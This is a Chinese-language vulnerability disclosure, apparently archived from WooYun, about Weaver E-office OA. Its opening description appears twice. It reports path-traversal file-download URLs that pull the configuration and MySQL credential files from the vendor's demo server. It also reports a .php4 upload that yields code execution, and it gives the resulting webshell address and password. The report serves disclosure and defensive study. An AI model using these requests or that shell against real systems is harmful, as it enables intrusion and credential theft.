VULHUB ™

### 简要描述： 继续 applychen 的脚步，因为之前我遇到过这个系统，最新官方demo中也确实存在问题。 感谢 applychen 提供的测试账号。 @cncert国家互联网应急中心 有什么问题，可以私信我。 ### 详细说明： ``` 继续 [WooYun: 泛微E-office OA管理系统存在SQL注射漏洞可查库](http://www.wooyun.org/bugs/wooyun-2013-034523) 的挖掘 官方demo http://eoffice8.weaver.cn:8028/login.php 测试账号还是那个 xj ``` 存在两个问题： ``` 0x01:任意文件下载漏洞 测试链接 http://eoffice8.weaver.cn:8028/inc/attach.php?OP=1&ATTACHMENT_NAME=index.php&ATTACHMENT_ID=5402024843 其中，参数 ATTACHMENT_NAME 未有效的控制其范围，导致任意文件下载 配置文件下载（程序zend加密，在网站http://www.showmycode.com/中可以解密） http://eoffice8.weaver.cn:8028/inc/attach.php?OP=1&ATTACHMENT_NAME=../../inc/oa_config.php&ATTACHMENT_ID=5402024843 数据库连接文件下载 http://eoffice8.weaver.cn:8028/inc/attach.php?OP=1&ATTACHMENT_NAME=../../mysql_config.ini&ATTACHMENT_ID=5402024843 ``` ``` 0x02:文件上传导致任意代码执行 经分析inc/utility_all.php 的源码可知附件上传的路径为：attachment/$ATTACHMENT_ID /$ATTACHMENT_NAME 建立个人日志--上传附件，查看源码得到相应的 ATTACHMENT_ID 及 ATTACHMENT_NAME 的值， 从配置文件中可以知道，附件中未禁止php4格式的文件上传，因此可以直接getshell...

### 简要描述： 继续 applychen 的脚步，因为之前我遇到过这个系统，最新官方demo中也确实存在问题。 感谢 applychen 提供的测试账号。 @cncert国家互联网应急中心 有什么问题，可以私信我。 ### 详细说明： ``` 继续 [WooYun: 泛微E-office OA管理系统存在SQL注射漏洞可查库](http://www.wooyun.org/bugs/wooyun-2013-034523) 的挖掘 官方demo http://eoffice8.weaver.cn:8028/login.php 测试账号还是那个 xj ``` 存在两个问题： ``` 0x01:任意文件下载漏洞 测试链接 http://eoffice8.weaver.cn:8028/inc/attach.php?OP=1&ATTACHMENT_NAME=index.php&ATTACHMENT_ID=5402024843 其中，参数 ATTACHMENT_NAME 未有效的控制其范围，导致任意文件下载 配置文件下载（程序zend加密，在网站http://www.showmycode.com/中可以解密） http://eoffice8.weaver.cn:8028/inc/attach.php?OP=1&ATTACHMENT_NAME=../../inc/oa_config.php&ATTACHMENT_ID=5402024843 数据库连接文件下载 http://eoffice8.weaver.cn:8028/inc/attach.php?OP=1&ATTACHMENT_NAME=../../mysql_config.ini&ATTACHMENT_ID=5402024843 ``` ``` 0x02:文件上传导致任意代码执行 经分析inc/utility_all.php 的源码可知附件上传的路径为：attachment/$ATTACHMENT_ID /$ATTACHMENT_NAME 建立个人日志--上传附件，查看源码得到相应的 ATTACHMENT_ID 及 ATTACHMENT_NAME 的值， 从配置文件中可以知道，附件中未禁止php4格式的文件上传，因此可以直接getshell 通过以上分析，最终得到的shell地址是：http://eoffice8.weaver.cn:8028/attachment/2506423447/conf1g.php4 密码是8（system权限） ``` ### 漏洞证明： ``` 0x01:任意文件下载漏洞 ``` [<img src="https://images.seebug.org/upload/201310/05141446515d6c49f5262a4afde20293b91d4883.jpg" alt="QQ图片20131005141421.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201310/05141446515d6c49f5262a4afde20293b91d4883.jpg) ``` ``` [<img src="https://images.seebug.org/upload/201310/05141532e21ac673d399df690ef7e13b8949ac01.jpg" alt="oa-config解密后.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201310/05141532e21ac673d399df690ef7e13b8949ac01.jpg) ``` ``` [<img src="https://images.seebug.org/upload/201310/051415495bbddbb6b2047d7b076f4e622f6a07e0.jpg" alt=".jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201310/051415495bbddbb6b2047d7b076f4e622f6a07e0.jpg) ``` ``` ``` 0x02:文件上传导致任意代码执行 ``` [<img src="https://images.seebug.org/upload/201310/051417459a7bba9a0f702adffcde382eddfb9064.jpg" alt="QQ图片20131005141715.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201310/051417459a7bba9a0f702adffcde382eddfb9064.jpg) ``` ``` [<img src="https://images.seebug.org/upload/201310/0514165345a42f2a7e4441001aae85a40de0e75c.jpg" alt="webshell.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201310/0514165345a42f2a7e4441001aae85a40de0e75c.jpg) ``` ``` [<img src="https://images.seebug.org/upload/201310/05141904766727f53a68fd7fc2e0ba943d34f9a9.jpg" alt="webshell.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201310/05141904766727f53a68fd7fc2e0ba943d34f9a9.jpg) ``` ``` [<img src="https://images.seebug.org/upload/201310/0514192231126d021d667496a00344a548252e60.jpg" alt=".jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201310/0514192231126d021d667496a00344a548252e60.jpg) ``` ```